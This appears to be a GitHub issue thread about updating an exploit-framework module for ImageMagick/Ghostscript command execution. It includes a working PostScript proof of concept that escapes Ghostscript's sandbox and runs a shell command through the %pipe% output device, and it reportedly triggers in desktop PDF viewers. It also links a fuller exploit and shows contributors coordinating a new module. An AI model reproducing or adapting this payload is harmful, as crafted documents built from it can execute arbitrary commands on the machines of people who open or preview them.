The ImagickMagick Delegate Arbitrary Command Excecution exploit is using a very old GhostScript exploit. It could be updated to use this 0day exploit:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1640
It can be exploited on Cent OS desktop from browser
works in evince (gnome pdf reader) and okular (kde) too
%!PS
a0
{ null restore } stopped { pop } if
(ppmraw) selectdevice
legal
mark /OutputFile (%pipe%gnome-calculator) currentdevice putdeviceprops
showpage
Yep, already on it. There's also exploit/unix/fileformat/ghostscript_type_confusion, which would be the closer of the two. I'm hoping to consolidate, but chances are we'll need a new module.
Neat, I would recommend using this one for maximum coverage.
https://gist.github.com/taviso/e640fdcdd232887e2591752d31f903e5
I don't know ruby or I would help, sorry about that 馃槢
Thanks again, @taviso!
PR is up. Sorry for the delay.
Most helpful comment
Neat, I would recommend using this one for maximum coverage.
https://gist.github.com/taviso/e640fdcdd232887e2591752d31f903e5
I don't know ruby or I would help, sorry about that 馃槢